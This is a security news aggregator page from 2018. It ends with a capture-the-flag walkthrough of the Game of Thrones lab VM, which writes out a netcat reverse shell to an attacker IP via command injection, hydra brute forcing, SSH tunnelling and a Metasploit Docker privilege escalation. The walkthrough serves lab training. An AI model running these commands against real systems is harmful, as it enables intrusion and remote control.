Feed aggregator

Week in review: Vulnerability tracking, GDPR quick guide, tackling the insider threat

News from 'Help Net Security' - Mon, 19/Feb/2018 - 08:26
Here’s an overview of some of last week’s most interesting news and articles:
Intel offers to pay for Spectre-like side channel vulnerabilities
Intel is expanding the bug bounty program it started last March, and is raising considerably the awards it plans to give out for helpful vulnerability information. The company is, simultaneously, starting a new bug bounty program focused specifically on side channel vulnerabilities, i.e., vulnerabilities that are rooted in Intel hardware but can be … More →
Categories: Cyber India

Learn Ethical Hacking Online — 9 Courses At Lowest Price Ever

News from 'The Hackers News' - Sun, 18/Feb/2018 - 00:24
How to become a Professional Hacker? This is one of the most frequently asked queries we came across on a daily basis. Do you also want to learn real-world hacking techniques but don’t know where to start? This week's THN deal is for you. Today THN Deal Store has announced a new Super-Sized Ethical Hacking Bundle that lets you get started on your career in hacking and penetration testing
Categories: Cyber India

Dell EMC plugs critical bugs in VMAX enterprise storage offerings

News from 'Help Net Security' - Sat, 17/Feb/2018 - 00:02
Dell EMC has patched two critical flaws in vApp Manager, the management interface for its VMAX enterprise storage systems, and is urging all customers to implement fixes as soon as possible.
About the VMAX enterprise storage vulnerabilities
The flaws were discovered and reported by Tenable’s director of reverse engineering Carlos Perez. The graver of the two is CVE-2018-1216, which marks the existence of a hard-coded password vulnerability. “The vApp Manager contains an undocumented default account … More →
Categories: Cyber India

Cleveland-Chicago Hyperloop Line Gets Feasibility Study

News from 'TechNewsWorld' - Fri, 16/Feb/2018 - 22:56
HTT has announced an agreement with an Ohio agency to launch a study on creating its first interstate hyperloop project in the U.S., connecting Chicago and Cleveland. The agreement with the Northern Ohio Area Coordinating Committee puts in motion a regional feasibility study, to be carried out in conjunction with the Illinois Department of Transportation. Various routes have been identified for the hyperloop service, which would operate a super high-speed system to accommodate transport at more than 700 miles per hour.
Categories: Cyber India

Scanned IDs of 119,000 FedEx customers exposed online

News from 'Help Net Security' - Fri, 16/Feb/2018 - 21:43
An unsecured Amazon Web Services bucket holding personal information and scans of IDs of some 119,000 US and international citizens has been found sitting online by Kromtech security researchers earlier this month. The stored data had been stockpiled by Bongo International, a company that specialized in helping North American retailers and brands sell online to consumers in other countries. Bongo was acquired by FedEx in 2014, relaunched as FedEx Cross-Border International, and ultimately shuttered in … More →
Categories: Cyber India

GDPR quick guide: Why non-compliance could cost you big

News from 'Help Net Security' - Fri, 16/Feb/2018 - 19:30
If you conduct business in the EU, offer goods or services to, or monitor the online behavior of EU citizens, then the clock is ticking. You only have a few more months – until May – to make sure your organization complies with GDPR data privacy regulations. Failure to abide by GDPR means you could get hit with huge fines.
Finding and investigating data breaches: Why it’s always too little, too late
Personal data protection … More →
Categories: Cyber India

New infosec products of the week: February 16, 2018

News from 'Help Net Security' - Fri, 16/Feb/2018 - 19:00
ScramFS: Encryption system for safeguarding cloud data
Scram Software has announced that ScramFS – an internationally peer-reviewed encryption system for safeguarding cloud data – is now available globally to SMEs, government and not-for-profit organizations, enabling encryption of sensitive data to reduce breaches and assist in ensuring legal, HIPAA and GDPR compliance.
Dtex Systems updates its Advanced User Behavior Intelligence Platform
Dtex Systems announced innovations to its Advanced User Behavior Intelligence Platform, designed to meet the … More →
Categories: Cyber India

Intel offers to pay for Spectre-like side channel vulnerabilities

News from 'Help Net Security' - Fri, 16/Feb/2018 - 18:30
Intel is expanding the bug bounty program it started last March, and is raising considerably the awards it plans to give out for helpful vulnerability information. Where information about critical vulnerabilities in Intel software, firmware and hardware could have previously been rewarded with up to $7,500, $10,000 and $30,000, respectively, now the bounties in those same categories go up to $10,000, $30,000 and $100,000.
A new bug bounty program for side channel vulnerabilities
The company … More →
Categories: Cyber India

Still relying solely on CVE and NVD for vulnerability tracking? Bad idea

News from 'Help Net Security' - Fri, 16/Feb/2018 - 18:00
2017 broke the previous all-time record for the highest number of reported vulnerabilities. The 20,832 vulnerabilities cataloged during 2017 by Risk Based Security (VulnDB) eclipsed the total covered by MITRE’s Common Vulnerability Enumeration (CVE) and the National Vulnerability Database (NVD) by more than 7,900. “Incredibly, we see too many companies still relying on CVE and NVD for vulnerability tracking, despite the US government funded organization falling short year after year. While some argue that the … More →
Categories: Cyber India

A Single-Character Message Can Crash Any Apple iPhone, iPad Or Mac

News from 'The Hackers News' - Fri, 16/Feb/2018 - 12:32
Only a single character can crash your iPhone and block access to the Messaging app in iOS as well as popular apps like WhatsApp, Facebook Messenger, Outlook for iOS, and Gmail. First spotted by Italian Blog Mobile World, a potentially new severe bug affects not only iPhones but also a wide range of Apple devices, including iPads, Macs and even Watch OS devices running the latest versions of
Categories: Cyber India

Apple's HomePod Could Leave a Lasting Mark With Customers

News from 'TechNewsWorld' - Fri, 16/Feb/2018 - 03:47
Apple's new $350 HomePod could make an impact in several ways. In addition to providing listeners with highly praised sound quality, the smart speaker literally could make an impression on some of the wood surfaces it touches -- in the form of white rings. The HomePod, which is compatible only with other Apple products, can stream music to those who have an Apple Music subscription. It has a few other capabilities too -- including the dubious ability to mar certain types of wood surfaces.
Categories: Cyber India

UK government officially blames Russia for NotPetya attack

News from 'Help Net Security' - Fri, 16/Feb/2018 - 01:52
The UK government has officially attributed the June 2017 NotPetya cyber attack to the Russian government. The statement is backed by an assessment of the UK’s National Cyber Security Centre, which has found that the Russian military was “almost certainly” responsible for it.
The NotPetya attack
“The NotPetya attack saw a malicious data encryption tool inserted into a legitimate piece of software used by most of Ukraine’s financial and government institutions,” the NCSC noted. … More →
Categories: Cyber India

Are Smart TV Designs Taking Home Security for Granted?

News from 'TechNewsWorld' - Fri, 16/Feb/2018 - 00:24
Millions of smart TVs from Samsung and some streaming devices from Roku recently were found to be vulnerable to cyberattacks, allowing intruders to take control and remotely change channels and volume settings, among other things, according to Consumer Reports research. Vulnerabilities were discovered not only in Samsung televisions, but also in TVs from TCL and other brands that sell sets compatible with the Roku TV smart-TV platform and streaming video devices such as Roku Ultra, according to the report.
Categories: Cyber India

IoT botnet bypasses firewalls to get to ZyXEL modems

News from 'Help Net Security' - Thu, 15/Feb/2018 - 21:06
NewSky Security’s honeypots have detected a new IoT botnet in the making. The botnet was named DoubleDoor, as it leverages two distinct backdoors to get to the target: ZyXEL PK5001Z modems.
The DoubleDoor attacks
What’s interesting about this particular botnet is that it’s ready to pass an extra layer of security to get to the modem: Juniper Networks’ NetScreen hardware firewall devices. To pull off the attack, it employs exploits for two vulnerabilities: CVE-2015-7755, which … More →
Categories: Cyber India

7 steps security leaders can take to deal with Spectre and Meltdown

News from 'Help Net Security' - Thu, 15/Feb/2018 - 20:51
Security and risk management leaders must take a pragmatic and risk-based approach to the ongoing threats posed by an entirely new class of vulnerabilities, according to Gartner. Spectre and Meltdown are the code names given to different strains of a new class of attacks that target an underlying exploitable design implementation inside the majority of computer chips manufactured over the last 20 years. Security researchers revealed three major variants of attacks in January 2018. The … More →
Categories: Cyber India

Why do we need a risk-based approach to authentication?

News from 'Help Net Security' - Thu, 15/Feb/2018 - 19:00
20 years ago, everyone worked at a desktop workstation hardwired into an office building. This made network security simple and organizations felt they could depend on the time-tested method of the trusted perimeter. Firewalls were relied on to keep out external threats, and anything within the network was considered secure and safe. Today, however, the number of variables has skyrocketed. The move to the cloud, BYOD, and increased use of outside contractors means a legitimate … More →
Categories: Cyber India

A five-year analysis of reported Windows vulnerabilities

News from 'Help Net Security' - Thu, 15/Feb/2018 - 18:30
Based on analysis of all disclosed Microsoft vulnerabilities in 2017, a new Avecto report shows a significant rise in the number of reported vulnerabilities. Last year, 685 vulnerabilities were found versus 325 vulnerabilities that were found in 2013. The removal of admin rights could mitigate 80% of all critical Microsoft vulnerabilities reported in 2017. Nearly all (95%) of critical vulnerabilities in Microsoft browsers could be mitigated by the removal of admin rights. The rise of … More →
Categories: Cyber India

SentinelOne Debuts Unified OS Threat Protection

News from 'TechNewsWorld' - Thu, 15/Feb/2018 - 18:30
SentinelOne this week announced a partnership with Microsoft to bolster threat protection for mixed platform users, making computing safer for Linux machines in a multiplatform workplace. SentinelOne will integrate its Endpoint Protection Platform with Microsoft's Windows Defender Advanced Threat Protection service to cover Mac and Linux device platforms. SentinelOne's EPP technology will feed all threats and detections from Mac and Linux endpoints seamlessly into the Windows Defender ATP console.
Categories: Cyber India

Cryptomining malware continues to drain enterprise CPU power

News from 'Help Net Security' - Thu, 15/Feb/2018 - 18:00
Cryptomining malware continues to impact organizations globally as 23% were affected by the Coinhive variant during January 2018, according to Check Point’s latest Global Threat Impact Index. Researchers discovered three different variants of cryptomining malware in its Top 10 most prevalent ranking, with Coinhive ranking first, impacting more than one-in-five organizations. Coinhive performs online mining of Monero cryptocurrency when a user visits a web page without the user’s approval. The implanted JavaScript then uses the … More →
Categories: Cyber India

Hack the Game of Thrones VM (CTF Challenge)

News from 'Hacking Articles' - Thu, 15/Feb/2018 - 16:04

Hello friends! Today we are going to take on another CTF challenge, known as Game of Thrones. Credit for making this VM goes to “OscarAkaElvis”. It is another capture-the-flag challenge in which our goal is to get all the flags to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start by finding the IP of the VM (here it is 192.168.1.133, but you will have to find your own).

netdiscover

Use nmap for port enumeration

nmap -p- -sV 192.168.1.133

We find that port 80 is running HTTP, so we open the IP in our browser.

We take a look at the source code and find the flag syntax.

Use dirb to enumerate the directories.

dirb http://192.168.1.133

We find the robots.txt file; we open it and find a few directories.

We open the directory /secret-island/ using the user-agent Three-eyed-raven.

We open it and find a link to a map.

When we open the map we find the location of all the flags.

We open the directory called /direct-access-to-kings-landing/ using the user-agent Three-eyed-raven.

We open the directory, take a look at the source code, and find what look like ports for port knocking and the user oberynmartell.

We then find /h/i/d/d/e/n/ directory using dirb and we open it.

We take a look at the source code and find the password for oberynmartell.

We use ftp to connect, logging in with the username and password we previously found. We get the first flag as soon as we log in.

We find two files and download them through ftp; one of them gives us the type of hash in use.

We save the hash in a file.

Now we use John the Ripper to crack the hash and find the password to be stark.

john --format=dynamic_2008 hash.txt

Now we use mcrypt to decrypt the encrypted file we found in the ftp server.

mcrypt -d the_wall.txt.nc

We now add the domain winterfell.7kingdoms.ctf to /etc/hosts and open the link found in the file.

We log in using the username and password and find a page with two images.

We take a look at the source code, and we find the second flag.

Along with the second flag we also find a hint that the image contains something, so we download the file, use strings to look inside it, and find a domain name.

strings stark_shield.jpg

It hints that a TXT record will contain something useful, so we use nslookup to check the TXT records. We had to make some changes to the domain name to make it valid, and we find our 3rd flag.

nslookup -q=txt Timef0rconqu3rs.7Kingdoms.ctf 192.168.1.133

Now we add the new domain name to /etc/hosts and open the link found in TXT record above.

We log in with the username and password we find in the TXT records.

We use the search provided by the site to check for vulnerabilities.

We use the file manager module, which opens a file manager that lets us access a few files.

In the /home/aryastark folder we find a file called flag.txt.

We download the file, open it on our system, and find our 4th flag.

We now have a hint to access a database, and we know the server is running PostgreSQL, so we connect to it using the username and password from the file we found earlier.

psql -h 192.168.1.133 -U robinarryn -d mountainandthevale

We find a table called flag; we open it and find a base64-encoded string.

We decode the base64-encoded string and find our 5th flag.

Now we check the other tables in case we missed anything. In one of the tables we find a few names.

SELECT * FROM arya_kill_list;

In arya_kill_list we find these names, which seem useful.

Searching through the database we find a rot16-encoded string.

We now decode the rot16-encoded string and find the name of a database along with the password. It also gives us a hint to use the username we find in the table above.

After enumerating the usernames we find that TheRedWomanMelisandre is the username.

Now we check the table and find a secret flag.

We know the kingdom of the Reach is on IMAP, as shown in the map, so we now use the numbers we found earlier to port knock.

knock 192.168.1.133 3487 64535 12345

Now we run an nmap scan to check whether any new port has opened on the server; we find that port 143, running IMAP, is now open.

nmap -p- 192.168.1.133

We use netcat to connect to it, with the username and password from the hint we found earlier.

nc 192.168.1.133 143

In the inbox we find our 6th flag. We also get a hint to use port 1337, along with a username and password to log in.

We log in to the site and find that it is a git site.

After enumerating through the files we find that this site is vulnerable to command injection, and a hint to use mysql.

We use netcat to get a reverse shell on the site; we use “”`code` to execute our code.

nc -e /bin/bash 192.168.1.116 1234

Now we set up our listener using netcat; as soon as we execute our command we get a reverse shell.

nc -lvp 1234

On the webpage earlier we found a hex-encoded string; when we decode it we get the location of a file, /home/tyrionlannister/checkpoint.txt, so we open it and find the username, password and name of the database we need to look for.

Now we use the information above to find the tables available in the database.

We find the name of the table: it is called iron_throne. We take a look inside the table.

Now we find Morse code; when we decode it, it converts to /etc/mysql/flag. When we try to access it we are told the file is not found. Earlier we found a hint stating that we don’t have enough privileges, so we take a look at our privileges.

We find that we can import files into the database, so first we create a table named Flag.

Now we import the file into our table.

Now when we access it we find our 7th flag. We also get a username and password for ssh login.

Now we use this to login through ssh.

ssh daenerystargaryen@192.168.1.133

Enumerating through the system we find two files called digger.txt and checkpoint.txt. checkpoint.txt contains a hint to log in through ssh at IP 172.25.0.2 and to use the file digger.txt to do so.

We download digger.txt to our system through ssh.

scp digger.txt root@192.168.1.116:

We use local tunnelling to bind it to our port 2222.

ssh daenerystargaryen@192.168.1.133 -L 2222:172.25.0.2:22 -N

Now we use hydra to log in through ssh, using root as the username and the digger.txt file to brute force the password.

We find that for the username root we have the password “Dr4g0nGl4ss!”

We use this to log in through ssh; we connect to localhost, since we set up the ssh local tunnel.

Enumerating through the files, we find our secret flag. We also get a username and password to log in through ssh.

We use metasploit to connect through ssh using this username and password.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.133

msf auxiliary(scanner/ssh/ssh_login) > set username branstark

msf auxiliary(scanner/ssh/ssh_login) > set  password Th3_Thr33_Ey3d_Raven

msf auxiliary(scanner/ssh/ssh_login) > run

After searching for some obvious possibilities to escalate privileges such as executables with the setuid bit set or exploits for the kernel, we noticed that this server is docker based. So we use the docker privilege escalation in metasploit.

msf > use exploit/linux/local/docker_daemon_privilege_escalation

msf exploit(linux/local/docker_daemon_privilege_escalation) >  set lhost 192.168.1.116

msf exploit(linux/local/docker_daemon_privilege_escalation) >  set payload linux/x86/meterpreter/reverse_tcp

msf exploit(linux/local/docker_daemon_privilege_escalation) >  set session 1

msf exploit(linux/local/docker_daemon_privilege_escalation) >  run

Now we get our escalated session; we check and find that we are root.
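The escalation above works because an account that can reach the Docker daemon is effectively root on the host. As an added example (not part of the original post), this shell function audits group and passwd files for such accounts, including ones whose primary group is docker and therefore do not appear in the group's member list. The sample files, branstark's docker membership and the svc_build account are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: list accounts that can talk to the Docker daemon through
# the "docker" group, which is equivalent to root on the host.

# docker_root_equivalents GROUP_FILE PASSWD_FILE
# Prints, one per line and sorted, every non-root account that has "docker"
# as a supplementary group (group file) or as its primary group (passwd file).
docker_root_equivalents() {
    group_file=$1
    passwd_file=$2

    # group(5) line format: name:password:gid:member1,member2,...
    docker_line=$(grep '^docker:' "$group_file" | head -n 1)
    [ -n "$docker_line" ] || return 0   # no docker group, nothing to report

    docker_gid=$(printf '%s\n' "$docker_line" | cut -d: -f3)
    members=$(printf '%s\n' "$docker_line" | cut -d: -f4 | tr ',' '\n')

    # passwd(5) field 4 is the primary gid; these accounts are missed by
    # tools that only read the member list of the group entry.
    primary=$(awk -F: -v gid="$docker_gid" '$4 == gid { print $1 }' "$passwd_file")

    printf '%s\n%s\n' "$members" "$primary" \
        | grep -v -e '^$' -e '^root$' \
        | sort -u
}

# Constructed sample data (not taken from the VM) so the audit runs offline.
sample_audit() {
    tmp=$(mktemp -d)
    cat > "$tmp/group" <<'EOF'
root:x:0:
docker:x:999:branstark,root
staff:x:50:daenerys
EOF
    cat > "$tmp/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
branstark:x:1000:1000::/home/branstark:/bin/bash
svc_build:x:1001:999::/home/svc_build:/bin/sh
daenerys:x:1002:50::/home/daenerys:/bin/bash
EOF
    docker_root_equivalents "$tmp/group" "$tmp/passwd"
    rm -rf "$tmp"
}

# On a real host: docker_root_equivalents /etc/group /etc/passwd
sample_audit
```

Every name it prints should be treated as a root-equivalent account when reviewing who may log in to the host.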

Now we enumerate through the files and find a password-protected zip file called final_battle and a file that tells us how to find the password. It contains pseudocode that tells us how to create the password using the secret flags we found.

We have now obtained 2 secret flags. Searching through the files, we find that a music file contains a secret flag. On the home page we find 2 music files; we use exiftool and find that the mp3 file contains the secret flag.

exiftool  game_of_thrones.mp3

Now we write a program in Python, using the pseudocode as reference.

We run the program and find the password.

We use 7z to extract the file with this password.

7z e final_battle

We find that a file called flag.txt was extracted; we open the file and find our final flag.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast.

The post Hack the Game of Thrones VM (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India